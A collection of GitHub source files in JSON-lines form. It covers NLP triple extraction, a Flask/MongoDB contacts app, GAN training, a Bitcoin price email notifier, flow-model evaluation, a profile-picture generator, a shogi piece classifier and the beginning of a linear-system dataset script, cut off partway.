+{"seq_id":"71359331886","text":"from nltk.tokenize import word_tokenize\nfrom nltk.corpus import stopwords\nfrom nltk.stem.porter import PorterStemmer\nstopwords = set(stopwords.words('english'))\n\nimport verb_net_reader\nimport file_tools\n\nxmlPath = \"../../../data/xml/\"\n\ndebug = True\ndebugXML = False\n\n\ndef getSPOTuples(xmlRoot):\n subjects = []\n predicates = []\n objects = []\n\n for sentenceNode in xmlRoot.find('document').find('sentences').findall('sentence'):\n for openie in sentenceNode.findall('openie'):\n for tripleNode in openie.findall('triple'):\n subjectNode = tripleNode.find('subject')\n predNode = tripleNode.find('relation')\n objectNode = tripleNode.find('object')\n\n subjects.append(subjectNode.find('text').text)\n predicates.append(predNode.find('text').text)\n objects.append(objectNode.find('text').text)\n\n return subjects, predicates, objects\n\n\ndef listTokenFrequencies(tokenList):\n if tokenList is None:\n return\n\n freqDict = {}\n\n for token in tokenList:\n if freqDict.get(token) is None:\n freqDict[token] = 1\n else:\n freqDict[token] += 1\n\n print(freqDict)\n\n\ndef getPoliticianOccurances(tokenList):\n trumpTripleIndices = []\n clintonTripleIndices = []\n\n for i in range(len(tokenList)):\n text = tokenList[i]\n if 'Trump' in text or 'Donald' in text:\n trumpTripleIndices.append(i)\n elif 'Clinton' in text or 'Hillary' in text:\n clintonTripleIndices.append(i)\n\n print(\"Trump: \", len(trumpTripleIndices), \"Clinton:\", len(clintonTripleIndices))\n return trumpTripleIndices, clintonTripleIndices\n\ndef getTokensFromList(indicesToExtract, textList):\n tokens = []\n for i in indicesToExtract:\n for token in word_tokenize(textList[i]):\n token = token.lower()\n if token not in stopwords:\n tokens.append(token)\n return tokens\n\n\ndef doSvoAnalysis(fileName):\n root = file_tools.getXMLRoot(fileName)\n subjects, predicates, objects = getSPOTuples(root)\n \n if(debugXML):\n print(subjects)\n print(predicates)\n print(objects)\n \n indicesOfTrumpSubs, indicesOfClintonSubs = getPoliticianOccurances(subjects)\n getPoliticianOccurances(predicates)\n getPoliticianOccurances(objects)\n \n trumpPreds = []\n trumpObjs = []\n trumpSubjs = []\n \n print('\\nTrump Triples:')\n for tripleIndex in indicesOfTrumpSubs:\n print(subjects[tripleIndex], '|', predicates[tripleIndex], '|', objects[tripleIndex])\n trumpPreds.append(predicates[tripleIndex])\n trumpObjs.append(objects[tripleIndex])\n trumpSubjs.append(subjects[tripleIndex])\n\n # # Print out the frequencies of tokens that occur as predicates when Trump occurs in the subject\n # print('Trump Predicate Frequencies:')\n # print(listTokenFrequencies(getTokensFromList(indicesOfTrumpSubs, predicates)))\n # # Print out the frequencies of tokens that occur as objects when Trump occurs in the subject\n # print('Trump Object Frequencies:')\n # print(listTokenFrequencies(getTokensFromList(indicesOfTrumpSubs, objects)))\n \n \n # Do the same thing for Clinton TODO: Extract this to a function\n clintonPreds = []\n clintonObjs = []\n clintonSubjs = []\n print('\\nClinton Triples:')\n for tripleIndex in indicesOfClintonSubs:\n print(subjects[tripleIndex], '|', predicates[tripleIndex], '|', objects[tripleIndex])\n clintonPreds.append(predicates[tripleIndex])\n clintonObjs.append(objects[tripleIndex])\n clintonSubjs.append(subjects[tripleIndex])\n\n return (trumpSubjs, trumpPreds, trumpObjs, clintonSubjs, clintonPreds, clintonObjs)\n\n # # Print out the frequencies of tokens that occur as predicates when Clinton occurs in the 
subject\n # print('Clinton Predicate Frequencies:')\n # print(listTokenFrequencies(getTokensFromList(indicesOfClintonSubs, predicates)))\n # # Print out the frequencies of tokens that occur as objects when Clinton occurs in the subject\n # print('Clinton Object Frequencies:')\n # print(listTokenFrequencies(getTokensFromList(indicesOfClintonSubs, objects)))\n\n\nif __name__ == '__main__':\n # Store verbnet xml in usable python dict format\n print('--- Reading verbnet files ---')\n verbNet = verb_net_reader.VerbNet()\n verbNet.readVerbnetFiles()\n verbNet.print()\n print()\n\n xmlFiles = file_tools.getFilesFrom(xmlPath)\n print(xmlFiles)\n for file in xmlFiles:\n doSvoAnalysis(xmlPath + file)","repo_name":"alex-calderwood/msu-data-mining-project","sub_path":"svo/corenlp/python/svo_xml.py","file_name":"svo_xml.py","file_ext":"py","file_size_in_byte":4589,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"}
+{"seq_id":"27725609890","text":"import sys\r\nimport torch\r\nimport random\r\nfrom datetime import datetime\r\nimport numpy as np\r\nimport csv\r\n\r\n\r\ncsv.field_size_limit(sys.maxsize)\r\n\r\ndef setup_seed(seed, cuda_deterministic=True):\r\n random.seed(seed)\r\n np.random.seed(seed)\r\n\r\n torch.manual_seed(seed)\r\n torch.cuda.manual_seed_all(seed)\r\n if cuda_deterministic: # slower, more reproducible\r\n torch.backends.cudnn.deterministic = True\r\n torch.backends.cudnn.benchmark = False\r\n else: # faster, less reproducible\r\n torch.backends.cudnn.deterministic = False\r\n torch.backends.cudnn.benchmark = True\r\n\r\n\r\ndef format_time():\r\n return datetime.now().strftime('%Y-%m-%d %H:%M:%S | ')\r\n\r\n\r\ndef load_tsv(input_file, quotechar=None):\r\n \"\"\"Reads a tab separated value file.\"\"\"\r\n with open(input_file, \"r\", encoding=\"utf-8\") as f:\r\n reader = csv.reader(f, delimiter=\"\\t\", quotechar=quotechar)\r\n lines = []\r\n for line in reader:\r\n if sys.version_info[0] == 2:\r\n line = list(unicode(cell, 'utf-8') for cell in line)\r\n lines.append(line)\r\n return lines\r\n\r\n\r\ndef remove_multiple_strings(cur_string, replace_list):\r\n for cur_word in replace_list:\r\n cur_string = cur_string.replace(cur_word, '')\r\n return cur_string\r\n","repo_name":"Cyril-JZ/InteR","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1298,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"2"}
+{"seq_id":"2304660570","text":"from flask import Flask,render_template,flash,redirect,url_for,session,logging,request\r\nfrom flask_pymongo import PyMongo\r\nfrom bson.objectid import ObjectId\r\n\r\napp = Flask(__name__)\r\napp.config[\"MONGO_URI\"] = \"mongodb://localhost:27017/RehberUygulama\" \r\nmongo = PyMongo(app)\r\n\r\n\r\n\r\n# Index Sayfası Ve Rehberdeki Kisileri Listeleme\r\n@app.route(\"/\")\r\ndef index():\r\n name = mongo.db.Rehber.find()\r\n count = mongo.db.Rehber.count()\r\n return render_template(\"index.html\",name = name,count = count)\r\n\r\n\r\n\r\n# Yeni Kisi Ekle Sayfası Get Islemi\r\n@app.route(\"/createPage\")\r\ndef createPage():\r\n return render_template(\"createPage.html\") \r\n\r\n# Yeni Kisi Ekleme Islemi\r\n@app.route(\"/create\",methods=[\"POST\"])\r\ndef create():\r\n name = request.form.get(\"name\")\r\n email = request.form.get(\"email\")\r\n phonenumber = request.form.get(\"phonenumber\")\r\n person = mongo.db.Rehber.insert({\"Name\": name, \"Email\": email, \"PhoneNumber\": phonenumber})\r\n return redirect(url_for(\"index\"))\r\n\r\n\r\n\r\n# Kisi Oku Sayfasina Verilerin Gonderilmesi\r\n@app.route(\"/readPage/\")\r\ndef readPage(Name):\r\n person = mongo.db.Rehber.find_one_or_404({\"_id\": ObjectId(Name)})\r\n return render_template(\"readPage.html\",person = person)\r\n\r\n\r\n\r\n# Kisi Guncelle Sayfasi Veriyi Gonderme\r\n@app.route(\"/updatePage/\")\r\ndef updatePage(Name):\r\n person = mongo.db.Rehber.find_one_or_404({\"_id\": ObjectId(Name)})\r\n return render_template(\"updatePage.html\",person = person)\r\n\r\n# Kisi Guncelleme Islemi\r\n@app.route(\"/update/\",methods=[\"POST\"])\r\ndef update(Name):\r\n name = request.form.get(\"name\")\r\n email = request.form.get(\"email\")\r\n phonenumber = request.form.get(\"phonenumber\")\r\n myquery = { \"_id\" : ObjectId(Name) }\r\n newValues = { \"$set\": { \"Name\": name, \"Email\": email, \"PhoneNumber\": phonenumber}} \r\n person = mongo.db.Rehber.update_one(myquery,newValues)\r\n return redirect(url_for(\"index\"))\r\n\r\n\r\n\r\n# Delete Sayfasi Ve Silinecek Kisi Bilgilerinin Gosterilmesi\r\n@app.route(\"/deletePage/\")\r\ndef deletePage(Name):\r\n person = mongo.db.Rehber.find_one_or_404({ \"_id\": ObjectId(Name)})\r\n return render_template(\"deletePage.html\",person = person) \r\n\r\n# Kisi Silme Islemi\r\n@app.route(\"/delete/\") \r\ndef delete(Name):\r\n person = mongo.db.Rehber.delete_one( {\"_id\": ObjectId(Name)})\r\n return redirect(url_for(\"index\"))\r\n\r\n\r\n \r\nif __name__ == \"__main__\":\r\n app.run(debug=True)","repo_name":"berkekurnaz/Flask_Framework_Ornekler","sub_path":"4_Flask_MongoDb_Crud_Islemleri/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2419,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"}
+{"seq_id":"39457522939","text":"import time\nfrom options.train_options import TrainOptions\nfrom data import CreateDataLoader\nfrom models import create_model\nfrom util.visualizer import Visualizer\nfrom util.summary import Logger\nimport tensorflow as tf\n\nif __name__ == '__main__':\n\topt = TrainOptions().parse()\n\tdata_loader = CreateDataLoader(opt)\n\tdataset = data_loader.load_data()\n\tdataset_size = len(data_loader)\n\tprint('#training images = %d' % dataset_size)\n\n\tmodel = create_model(opt)\n\tmodel.setup(opt)\n\t# visualizer = Visualizer(opt)\n\n\t# Create summary writer\n\tlogger = Logger(opt)\n\ttags = ['D_A', 'G_A', 'cycle_A', 'idt_A', 'D_B', 'G_B', 'cycle_B', 'idt_B']\n\t# loss_sum = dict.fromkeys(tags, 0)\n\t# loss_avg = dict.fromkeys(tags, 0)\n\n\ttotal_steps = 0\n\tfor epoch in range(opt.epoch_count, opt.niter + opt.niter_decay + 1):\n\t\tepoch_start_time = time.time()\n\t\titer_data_time = time.time()\n\t\tepoch_iter = 0\n\n\t\tfor i, data in enumerate(dataset):\n\t\t\titer_start_time = time.time()\n\t\t\tif total_steps % opt.print_freq == 0:\n\t\t\t\tt_data = iter_start_time - iter_data_time\n\t\t\t# visualizer.reset()\n\t\t\ttotal_steps += opt.batchSize\n\t\t\tepoch_iter += opt.batchSize\n\t\t\tmodel.set_input(data)\n\t\t\tmodel.optimize_parameters()\n\n\t\t\t# losses = model.get_current_losses()\n\t\t\t# for tag in tags:\n\t\t\t# \tloss_sum[tag] += losses[tag]\n\t\t\t# \tloss_avg[tag] = loss_sum[tag] / total_steps\n\n\t\t\tif total_steps % opt.display_freq == 0:\n\t\t\t\tsave_result = total_steps % opt.update_html_freq == 0\n\t\t\t\t# visualizer.display_current_results(model.get_current_visuals(), epoch, save_result)\n\n\t\t\tif total_steps % opt.print_freq == 0:\n\t\t\t\tlosses = model.get_current_losses()\n\t\t\t\tt = (time.time() - iter_start_time) / opt.batchSize\n\n\t\t\t\tprint ('step %d, cost %.3f secs, D_A:%.3f, G_A:%.3f, cycle_A:%.3f, idt_A:%.3f, D_B:%.3f, G_B:%.3f, cycle_B:%.3f, idt_B:%.3f ' %\n\t\t\t\t (total_steps, t, losses['D_A'], losses['G_A'], losses['cycle_A'], losses['idt_A'], losses['D_B'], losses['G_B'], losses['cycle_B'], losses['idt_B'] ))\n\t\t\t\t\n\t\t\t\t\n\t\t\t\tfor tag in tags:\n\t\t\t\t\tlogger.scalar_summary(tag, losses[tag], total_steps)\n\t\t\t\t\t\n\t\t\t\t# visualizer.print_current_losses(epoch, epoch_iter, losses, t, t_data)\n\t\t\t\t# if opt.display_id > 0:\n\t\t\t\t\t# visualizer.plot_current_losses(epoch, float(epoch_iter) / dataset_size, opt, losses)\n\n\t\t\tif total_steps % opt.save_latest_freq == 0:\n\t\t\t\tprint('saving the latest model (epoch %d, total_steps %d)' %\n\t\t\t\t\t (epoch, total_steps))\n\t\t\t\tmodel.save_networks('latest')\n\n\t\t\titer_data_time = time.time()\n\t\tif epoch % opt.save_epoch_freq == 0:\n\n\t\t\t# print ('Average loss: D_A:%.3f, G_A:%.3f, cycle_A:%.3f, idt_A:%.3f, D_B:%.3f, G_B:%.3f, cycle_B:%.3f, idt_B:%.3f ' %\n\t\t\t# \t (total_steps, t, loss_avg['D_A'], loss_avg['G_A'], loss_avg['cycle_A'], loss_avg['idt_A'], loss_avg['D_B'], loss_avg['G_B'], loss_avg['cycle_B'], loss_avg['idt_B'] ))\n\t\t\t\t\n\t\t\tprint('saving the model at the end of epoch %d, iters %d' %\n\t\t\t\t (epoch, total_steps))\n\t\t\tmodel.save_networks('latest')\n\t\t\tmodel.save_networks(epoch)\n\n\t\tprint('End of epoch %d / %d \\t Time Taken: %d sec' %\n\t\t\t (epoch, opt.niter + opt.niter_decay, time.time() - 
epoch_start_time))\n\t\tmodel.update_learning_rate()\n","repo_name":"Alexis97/Pet-Hair-Color-Transfer","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3105,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"}
+{"seq_id":"2415346001","text":"#!/usr/bin/python\n\n#import libraries\nimport sys\nimport os\nimport time\nimport ConfigParser\nimport urllib2\nimport smtplib\nimport getpass\nfrom socket import gaierror\nfrom socket import error as socketerror\nfrom email.mime.text import MIMEText\n\n\nclass BTCtxtError(Exception):\n def __init__(self, message, cause):\n super(BTCtxtError, self).__init__('{}, caused by {}'.format(message, repr(cause)))\n self.cause = cause\n\n\nclass UnknownError(Exception):\n def __init__(self, message):\n super(UnknownError, self).__init__('{}, caused by {}'.format(message, repr(sys.exc_info()[1])))\n\n\nclass ParserError(Exception):\n pass\n\n\nclass BTCtxt:\n def __init__(self):\n self.last = 1\n self.from_address = \"\"\n self.smtp = \"\"\n self.port = \"\"\n self.to_address = \"\"\n self.user = \"\"\n self.pw = \"\"\n self.ratio = []\n self.sleeptime = []\n self.currency = \"\"\n return None\n\n def monitor(self):\n url = \"https://api.bitcoinaverage.com/ticker/global/\" + btctxt.currency + \"/last\"\n #get current price\n try:\n current = float(urllib2.urlopen(url).read())\n except(urllib2.HTTPError) as e:\n raise BTCtxtError(\"Invalid URL: {}\".format(url), e)\n else:\n #compare current to log price\n change = abs((btctxt.last-current)/current)\n if change > btctxt.ratio:\n try:\n btctxt.send_email(current)\n except smtplib.SMTPAuthenticationError as e:\n raise BTCtxtError('Email log-in failed', e)\n except gaierror as e:\n raise BTCtxtError('Invalid server {}'.format(self.smtp), e)\n except socketerror as e:\n raise BTCtxtError('Invalid (server, port): ({}, {})'.format(self.smtp, self.port), e)\n except Exception:\n raise UnknownError('Something went wrong sending your message... bummer. Please raise an issue on git at dougmercer/btctxt')\n else:\n btctxt.last = current\n return self\n\n def send_email(self, current):\n msg = self._write_email(current)\n #start server\n try:\n server = smtplib.SMTP(self.smtp, self.port, None, 30)\n server.ehlo()\n server.starttls()\n server.login(self.user, self.pw)\n server.sendmail(self.from_address, [self.to_address], msg.as_string())\n finally:\n server.close()\n\n def _write_email(self, current):\n #Format email_content\n timestr = time.strftime(\"%H:%M\", time.localtime())\n email_content = \"The price of BTC is currently \" + str(current) + self.currency + \" as of \" + timestr + \".\"\n #Create msg\n msg = MIMEText(email_content)\n msg['Subject'] = \"BTCtxt\"\n msg['To'] = self.to_address\n msg['From'] = self.from_address\n return msg\n\n\ndef get_conf(path):\n parser = ConfigParser.RawConfigParser()\n parser.read(path)\n necessary = [\"smtp\", \"port\", \"to\", \"from\"]\n optional = [\"currency\", \"sleeptime\", \"ratio\"]\n #check necessary\n for item in necessary:\n if item not in parser.options(\"Necessary\"):\n raise ParserError(\"Please include a {} entry in the [Necessary] section.\".format(item))\n #check optional\n for item in optional:\n if item not in parser.options(\"Optional\"):\n if item is \"currency\":\n parser.set(\"Optional\", item, \"USD\")\n elif item is \"sleeptime\":\n parser.set(\"Optional\", item, \"180\")\n elif item is \"ratio\":\n parser.set(\"Optional\", item, \"0.075\")\n return parser\n\n\nif __name__ == '__main__':\n #Create instance of btctxt class\n btctxt = BTCtxt()\n #Populate btctxt attributes using one of three input methods\n if len(sys.argv) == 2:\n #if only path to .conf file provided\n #read .conf\n parser = get_conf(sys.argv[1])\n #write .conf to btctxt\n btctxt.from_address = 
parser.get(\"Necessary\", \"from\")\n btctxt.smtp = parser.get(\"Necessary\", \"smtp\")\n btctxt.port = parser.get(\"Necessary\", \"port\")\n btctxt.to_address = parser.get(\"Necessary\", \"to\")\n btctxt.ratio = float(parser.get(\"Optional\", \"ratio\"))\n btctxt.sleep_time = float(parser.get(\"Optional\", \"sleeptime\"))\n btctxt.currency = parser.get(\"Optional\", \"currency\")\n #get user and pw from std in\n btctxt.user = raw_input(\"Username: \")\n btctxt.pw = getpass.getpass()\n elif len(sys.argv) == 3 and sys.argv[2] is \"c\":\n #if path to .conf file and letter c provided as second argument\n #read .conf\n parser = get_conf(sys.argv[1])\n #write .conf to btctxt\n btctxt.from_address = parser.get(\"Necessary\", \"from\")\n btctxt.smtp = parser.get(\"Necessary\", \"smtp\")\n btctxt.port = parser.get(\"Necessary\", \"port\")\n btctxt.to_address = parser.get(\"Necessary\", \"to\")\n btctxt.ratio = float(parser.get(\"Optional\", \"ratio\"))\n btctxt.sleep_time = float(parser.get(\"Optional\", \"sleeptime\"))\n btctxt.currency = parser.get(\"Optional\", \"currency\")\n btctxt.user = parser.get(\"Credentials\", \"user\")\n btctxt.pw = parser.get(\"Credentials\", \"pw\")\n else:\n #read stdin\n btctxt.from_address = sys.argv[1]\n btctxt.smtp = sys.argv[2]\n btctxt.port = sys.argv[3]\n btctxt.to_address = sys.argv[4]\n btctxt.user = sys.argv[5]\n btctxt.pw = sys.argv[6]\n btctxt.ratio = float(sys.argv[7])\n btctxt.sleep_time = float(sys.argv[8])\n btctxt.currency = sys.argv[9]\n while True:\n btctxt = btctxt.monitor()\n time.sleep(btctxt.sleep_time)\n","repo_name":"jarbanas/btctxt","sub_path":"btctxt.py","file_name":"btctxt.py","file_ext":"py","file_size_in_byte":6914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"71562748845","text":"import os\nimport argparse\nimport pickle\nimport torch\n\n# Data\nfrom pixelflow.data import CategoricalCIFAR10\nfrom pixelflow.data.utils import DEFAULT_PATH\nLOG_FOLDER = os.path.join(os.path.dirname(DEFAULT_PATH), 'experiments/log')\nCHECK_FOLDER = os.path.join(os.path.dirname(DEFAULT_PATH), 'experiments/check')\n\n\ndef dataset_elbo_bpd(model, data_loader, device, double):\n with torch.no_grad():\n bpd = 0.0\n count = 0\n for i, (batch, _) in enumerate(data_loader):\n if double: batch = batch.double()\n bpd += model.elbo_bpd(batch.to(device)).cpu().item() * len(batch)\n count += len(batch)\n print('{}/{}'.format(i+1, len(data_loader)), bpd/count, end='\\r')\n return bpd / count\n\n\ndef dataset_iwbo_bpd(model, data_loader, device, double, k, batch_size=None):\n with torch.no_grad():\n bpd = 0.0\n count = 0\n for i, (batch, _) in enumerate(data_loader):\n if double: batch = batch.double()\n bpd += model.iwbo_bpd(batch.to(device), k=k, batch_size=batch_size).cpu().item() * len(batch)\n count += len(batch)\n print('{}/{}'.format(i+1, len(data_loader)), bpd/count, end='\\r')\n return bpd / count\n\n\ndef eval_elbo(create_model_fn):\n\n parser = argparse.ArgumentParser()\n\n # Training args\n parser.add_argument('--model_path', type=str)\n parser.add_argument('--device', type=str, default='cuda')\n parser.add_argument('--batch_size', type=int, default=100)\n parser.add_argument('--test_set', type=eval, default=True)\n parser.add_argument('--double', type=eval, default=False)\n parser.add_argument('--k', type=int, default=None)\n\n eval_args = parser.parse_args()\n\n if eval_args.k is None:\n batch_size = eval_args.batch_size\n iwbo_batch_size = None\n elif eval_args.k <= eval_args.batch_size:\n assert eval_args.batch_size % eval_args.k == 0\n batch_size = eval_args.batch_size // eval_args.k\n iwbo_batch_size = None\n else:\n assert eval_args.k % eval_args.batch_size == 0\n batch_size = 1\n iwbo_batch_size = eval_args.batch_size\n model_log = os.path.join(LOG_FOLDER, eval_args.model_path)\n model_check = os.path.join(CHECK_FOLDER, eval_args.model_path)\n\n with open('{}/args.pickle'.format(model_log), 'rb') as f:\n args = pickle.load(f)\n\n ##################\n ## Specify data ##\n ##################\n\n torch.manual_seed(0)\n\n data = CategoricalCIFAR10()\n\n if eval_args.test_set:\n data_loader = torch.utils.data.DataLoader(data.test, batch_size=batch_size)\n else:\n data_loader = torch.utils.data.DataLoader(data.train, batch_size=batch_size)\n test_str = 'test' if eval_args.test_set else 'train'\n\n ################\n ## Load model ##\n ################\n\n model = create_model_fn(args)\n\n # Load pre-trained weights\n weights = torch.load('{}/model.pt'.format(model_check), map_location='cpu')\n model.load_state_dict(weights, strict=False)\n model = model.to(eval_args.device)\n model = model.eval()\n if eval_args.double: model = model.double()\n double_str = '_double' if eval_args.double else ''\n\n ####################\n ## Compute loglik ##\n ####################\n\n if eval_args.k is None:\n # Compute ELBO\n elbo = dataset_elbo_bpd(model, data_loader, device=eval_args.device, double=eval_args.double)\n print('Done, ELBO: {}'.format(elbo))\n fname = '{}/elbo_bpd_{}{}.txt'.format(model_log, test_str, double_str)\n with open(fname, \"w\") as f:\n f.write(str(elbo))\n else:\n iwbo = dataset_iwbo_bpd(model, data_loader, device=eval_args.device, double=eval_args.double, k=eval_args.k, batch_size=iwbo_batch_size)\n print('Done, IWBO({}): 
{}'.format(eval_args.k, iwbo))\n fname = '{}/iwbo{}_bpd_{}{}.txt'.format(model_log, eval_args.k, test_str, double_str)\n with open(fname, \"w\") as f:\n f.write(str(iwbo))\n","repo_name":"didriknielsen/pixelcnn_flow","sub_path":"experiments/eval/bpd/_eval_elbo.py","file_name":"_eval_elbo.py","file_ext":"py","file_size_in_byte":3976,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"2"}
+{"seq_id":"35433428289","text":"import png_lib\nfrom random import randint\n\n\n\n#https://stackoverflow.com/a/43235/7018899\ndef random_color(color_mask = None):\n r = randint(0, 255)\n g = randint(0, 255)\n b = randint(0, 255)\n if color_mask:\n r = int((r + color_mask[0])/2)\n g = int((g + color_mask[0])/2)\n b = int((b + color_mask[0])/2)\n return (r, g, b)\n\ndef gen_profile_pic(width, height, color_mask=None, background=(0, 0, 0, 0), \n color_probability = 50):\n png_data = []\n color = (*random_color(color_mask), 255)\n mid_index = (width - 1)/2\n for i in range(height):\n png_data.append([])\n for j in range(width):\n if j < width/2:\n if randint(0, 99) < color_probability:\n png_data[i].append(color)\n else:\n png_data[i].append(background)\n else:\n png_data[i].append(png_data[i][int(2 * mid_index - j)])\n profile_pic = png_lib.png(data = png_data)\n #import pdb;pdb.set_trace()\n return profile_pic\n\ndef gen_filenames(quantity):\n from uuid import uuid4\n filenames = []\n for i in range(quantity):\n filenames.append(\"picgen_\" + str(uuid4().hex) + \".png\")\n return filenames\n\ndef main():\n from sys import argv\n from os import makedirs, path\n dir = \"tmp_profile_pic\"\n makedirs(dir, exist_ok = True)\n try:\n filenames = gen_filenames(int(argv[1]))\n except IndexError:\n filenames = gen_filenames(5)\n for filename in filenames:\n filename = path.join(dir, filename)\n profile_pic = gen_profile_pic(12, 12, (255, 255, 255), \n (255, 255, 255, 255), 40)\n profile_pic.enlarge_pixel_data(16)\n profile_pic.smart_create(filename = filename)\n \n print(\"created %d png(s)\" % len(filenames))\n\n\nif __name__==\"__main__\":\n main()","repo_name":"09milk/profile_picture_generator","sub_path":"profile_picture_generator.py","file_name":"profile_picture_generator.py","file_ext":"py","file_size_in_byte":1885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"31725421818","text":"from dataclasses import InitVar, dataclass, field\nfrom typing import Any, Final, List\n\nimport numpy as np\nimport numpy.typing as npt\nimport torch\nimport torchvision\nfrom torch import nn\nfrom torchvision import models, transforms\n\nCLASSES: Final[List[str]] = sorted(\n [\n \"-01\",\n \"-02\",\n \"-03\",\n \"-04\",\n \"-05\",\n \"-06\",\n \"-07\",\n \"-08\",\n \"-09\",\n \"-10\",\n \"-11\",\n \"-12\",\n \"-13\",\n \"-14\",\n \"00\",\n \"01\",\n \"02\",\n \"03\",\n \"04\",\n \"05\",\n \"06\",\n \"07\",\n \"08\",\n \"09\",\n \"10\",\n \"11\",\n \"12\",\n \"13\",\n \"14\",\n ]\n)\n\nIntegerArrayType: Final[Any] = npt.NDArray[np.int_]\nDeviceType: Final[Any] = torch._C.device\nTransformType: Final[Any] = transforms.Compose\nModelType: Final[Any] = torchvision.models.densenet161\nTensorType: Final[Any] = torch.Tensor\n\n\n@dataclass\nclass ShogiModel:\n device: DeviceType = field(init=False)\n transform: TransformType = field(init=False)\n model: ModelType = field(init=False)\n model_path: InitVar[str] = field(default=\"../models/model.pth\")\n\n def __post_init__(self, model_path):\n self.device = torch.device(\n \"cuda:0\" if torch.cuda.is_available() else \"cpu\"\n )\n self.transform = transforms.Compose(\n [\n transforms.ToPILImage(),\n transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)),\n ]\n )\n self.model = models.densenet161()\n self.model.classifier = nn.Linear(\n self.model.classifier.in_features, len(CLASSES)\n )\n self.model = self.model.to(device=self.device)\n self.model.load_state_dict(\n torch.load(model_path, map_location=self.device)\n )\n\n def predict(self, images: IntegerArrayType) -> IntegerArrayType:\n results: IntegerArrayType = np.array([])\n self.model.eval()\n with torch.no_grad():\n for image in images:\n inputs: TensorType = (\n self.transform(image).unsqueeze(0).to(self.device)\n )\n outputs: TensorType = self.model(inputs)\n predicted: TensorType = torch.max(outputs, 1)[1]\n results = np.append(results, int(CLASSES[predicted]))\n return results.reshape(9, 9).astype(np.int32)\n","repo_name":"Futaba-Kosuke/shogi-camera-server","sub_path":"classify_shogi_piece/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2449,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"}
+{"seq_id":"10032064859","text":"import os\r\nimport csv\r\nimport warnings\r\nimport numpy as np\r\nimport pandas as pd\r\nimport tensorflow as tf\r\nimport matplotlib.pyplot as plt\r\nimport DatasetUtil as datasetUtil\r\n\r\nfrom sklearn import metrics\r\nfrom sklearn.utils import shuffle\r\nfrom sklearn.preprocessing import MinMaxScaler\r\nfrom sklearn.linear_model import LinearRegression\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.linear_model import SGDRegressor\r\nfrom sklearn.linear_model import SGDRegressor\r\nfrom sklearn.kernel_ridge import KernelRidge\r\nfrom sklearn.linear_model import ElasticNet\r\nfrom sklearn.linear_model import BayesianRidge\r\nfrom sklearn.ensemble import GradientBoostingRegressor\r\nfrom sklearn.svm import SVR\r\n\r\n\r\ndef preConditions(dataset):\r\n \"\"\"\r\n Verificarea folosirii tensorflow GPU, pentru o antrenare mai rapida se va folosi GPU, in locul CPU-ului.\r\n :param dataset: Setul de date actual\r\n :return: Afiseaza daca Tensorflow GPU este activat sau nu. Afiseaza primele 5 randuri din setul de date.\r\n \"\"\"\r\n warnings.filterwarnings(\"ignore\", category=np.VisibleDeprecationWarning)\r\n os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\r\n os.environ[\"PATH\"] += os.pathsep + 'C:/Program Files/Graphviz/bin/'\r\n\r\n if tf.test.gpu_device_name():\r\n print('Default GPU Device: {}'.format(tf.test.gpu_device_name()))\r\n else:\r\n print(\"Please install GPU version of TF\")\r\n print(\"----- PRIMELE 5 VALORI DIN SETUL DE DATE ----- \")\r\n print(dataset.head())\r\n\r\n\r\ndef deserializeMainDataset(dataset):\r\n \"\"\"\r\n Se deserializeaza setul de date, valorile din csv fiind in bytecode -> se transforma in valori de tip float.\r\n :param dataset: Setul de date, valori in bytecode.\r\n :return: Setul de date in valori de tip float.\r\n \"\"\"\r\n deserializedDataset = datasetUtil.deserializeDataset(dataset)\r\n print(\"----- AFTER THE DESERIALIZATION OF THE DATASET -----\")\r\n for i in range(5):\r\n print(deserializedDataset[i])\r\n\r\n return deserializedDataset\r\n\r\n\r\ndef reformatTheDataset(dataset):\r\n \"\"\"\r\n Pentru a intra in input layer-ul retelei neuronale, coeficientii dependenti si independeti trebuie restructurati.\r\n :param dataset: Setul de date care contine coeficientii dependenti, independenti si solutiile in valor de tip float.\r\n :return: Coeficientii dependenti si independenti refactorizati si stocati in X, iar Solutiile (valorile care trebuie\r\n aflate) sunt stocate in Y.\r\n \"\"\"\r\n sys = [datasetUtil.reformatList(list(row[0])) for row in dataset]\r\n sol = [list(row[1]) for row in dataset]\r\n X = datasetUtil.createX(sys, sol)\r\n Y = [row[2].astype(\"float32\") for row in dataset]\r\n X = np.array([np.array(val) for val in X])\r\n Y = np.array([np.array(val) for val in Y])\r\n\r\n return X, Y\r\n\r\n\r\ndef NormalizeDataSklearn(X, Y, revertBoolean=False):\r\n \"\"\"\r\n In cazul in care in sisteme sunt prezenti coeficienti care au valori mari:\r\n Normalizarea valorilor sistemului intre [0,1] pentru o antrenare mai usoara.\r\n :param X: Coeficientii sistemului patratic [2x2].\r\n :param Y: Necunoscutele sistemului.\r\n :param revertBoolean: false daca se doreste normalizarea, true daca se doreste inversarea acestei transformari,\r\n adica aducerea inapoi la forma originala a valorilor.\r\n :return: (Coeficientii dependenti / Coeficientii independenti normalizati) -> X / (Necunoscutele) - > Y\r\n \"\"\"\r\n min_max_scaler = MinMaxScaler(feature_range=(0, 1))\r\n if not 
